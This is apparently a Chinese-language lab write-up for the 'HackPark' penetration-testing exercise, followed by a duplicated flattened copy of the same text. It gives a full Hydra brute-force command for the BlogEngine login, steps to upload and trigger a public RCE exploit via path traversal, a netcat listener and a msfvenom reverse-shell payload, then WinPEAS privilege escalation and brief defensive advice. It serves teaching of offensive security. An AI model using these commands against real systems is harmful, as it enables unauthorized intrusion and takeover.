HackPark渗透测试实战教学文档

1. 信息收集阶段

1.1 端口扫描

使用RustScan进行快速端口扫描：

rustscan -a <目标IP> --range 0-65535 -- -sV -oN hackpark.nmap

或者使用Nmap进行详细扫描：

nmap -Pn -sC -sV -sS -p- <目标IP>

1.2 Web应用识别

访问80端口发现小丑图片
使用Google识图确认是Pennywise(小丑回魂)图片
检查网站版本信息：BlogEngine Version 3.3.6.0

2. 暴力破解登录

2.1 寻找登录入口

检查主页选项选项卡中的登录选项
右键点击登录表单检查元素，获取表单请求方法(POST)
使用Burp Suite拦截流量分析POST参数

2.2 Hydra暴力破解配置

使用Hydra进行暴力破解的命令：

hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt <目标IP> http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=tH3nyjHWshy31CD1HUL212Q2sUlmbJdmA3PH9QrQ49rHSGqip79fK8fK5w4R7A%2BFv2G31xXxSwbuy6esy7JCppaHYfeaUtqtFg4aegSGfDLkkKfhuVa81dv5v2mFDlGJ1If8gDK4WByANbsudxOHKaJxujKDU8OBewkI6AFhnRNcbUma&__EVENTVALIDATION=oztmFtnEAgIEFOmV8sjMAU%2BW5%2BIFfkBcHNipRMg%2FufY3Fjp8pw8gZaDh4fKcBwNZYLmHVX0EIOBoThym43y1HuSP9JPodblTBkUym%2F4InzzxcNfFcy00UcAjFbfzsef8VMHNFfXOxlLnJqSLDO34qyWBaSkrdN5QnpX%2BzDvzCkb0Q3ek&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

参数说明：

-s 80: 指定端口
-l admin: 指定用户名
-P rockyou.txt: 密码字典
http-post-form: 指定POST表单攻击
最后部分是表单数据和失败响应标识

3. 漏洞利用

3.1 查找漏洞

使用searchsploit查找BlogEngine 3.3.6.0的漏洞：

searchsploit BlogEngine 3.3.6.0

发现3个RCE漏洞，选择其中一个(46353)：

searchsploit -m aspx/webapps/46353.cs

3.2 准备漏洞利用文件

将漏洞利用代码重命名为"PostView.ascx"
修改代码中的IP和端口为攻击机监听地址
以管理员身份登录后：
- 点击"内容"->"帖子"->"欢迎来到Hackpark"->"文件管理器"
- 点击"上传"，上传PostView.ascx文件

3.3 触发漏洞

访问以下URL触发RCE：

http://<目标IP>/?theme=../../App_Data/files

同时设置Netcat监听：

nc -lvnp <监听端口>

4. 权限提升

4.1 建立稳定反向shell

使用msfvenom创建payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=1234 -e x64/shikata_ga_nai -f exe -o reverse.exe

通过已获得的shell上传并执行reverse.exe

4.2 使用WinPEAS进行权限提升检查

上传并运行WinPEAS工具，检查系统漏洞和配置问题：

.\winpeas.exe

5. 关键点总结

信息收集：全面扫描和版本识别是成功的基础
暴力破解：需要准确获取表单结构和参数
漏洞利用：必须精确匹配应用版本和漏洞
权限维持：从临时shell升级到稳定meterpreter会话
权限提升：使用WinPEAS等工具系统化寻找提权路径

6. 防御建议

使用强密码策略防止暴力破解
及时更新应用版本修补已知漏洞
限制文件上传类型和目录权限
实施最小权限原则
监控异常网络连接和进程行为

HackPark渗透测试实战教学文档 1. 信息收集阶段 1.1 端口扫描使用RustScan进行快速端口扫描：或者使用Nmap进行详细扫描： 1.2 Web应用识别访问80端口发现小丑图片使用Google识图确认是Pennywise(小丑回魂)图片检查网站版本信息：BlogEngine Version 3.3.6.0 2. 暴力破解登录 2.1 寻找登录入口检查主页选项选项卡中的登录选项右键点击登录表单检查元素，获取表单请求方法(POST) 使用Burp Suite拦截流量分析POST参数 2.2 Hydra暴力破解配置使用Hydra进行暴力破解的命令：参数说明： -s 80 : 指定端口 -l admin : 指定用户名 -P rockyou.txt : 密码字典 http-post-form : 指定POST表单攻击最后部分是表单数据和失败响应标识 3. 漏洞利用 3.1 查找漏洞使用searchsploit查找BlogEngine 3.3.6.0的漏洞：发现3个RCE漏洞，选择其中一个(46353)： 3.2 准备漏洞利用文件将漏洞利用代码重命名为"PostView.ascx" 修改代码中的IP和端口为攻击机监听地址以管理员身份登录后：点击"内容"->"帖子"->"欢迎来到Hackpark"->"文件管理器" 点击"上传"，上传PostView.ascx文件 3.3 触发漏洞访问以下URL触发RCE：同时设置Netcat监听： 4. 权限提升 4.1 建立稳定反向shell 使用msfvenom创建payload：通过已获得的shell上传并执行reverse.exe 4.2 使用WinPEAS进行权限提升检查上传并运行WinPEAS工具，检查系统漏洞和配置问题： 5. 关键点总结信息收集：全面扫描和版本识别是成功的基础暴力破解：需要准确获取表单结构和参数漏洞利用：必须精确匹配应用版本和漏洞权限维持：从临时shell升级到稳定meterpreter会话权限提升：使用WinPEAS等工具系统化寻找提权路径 6. 防御建议使用强密码策略防止暴力破解及时更新应用版本修补已知漏洞限制文件上传类型和目录权限实施最小权限原则监控异常网络连接和进程行为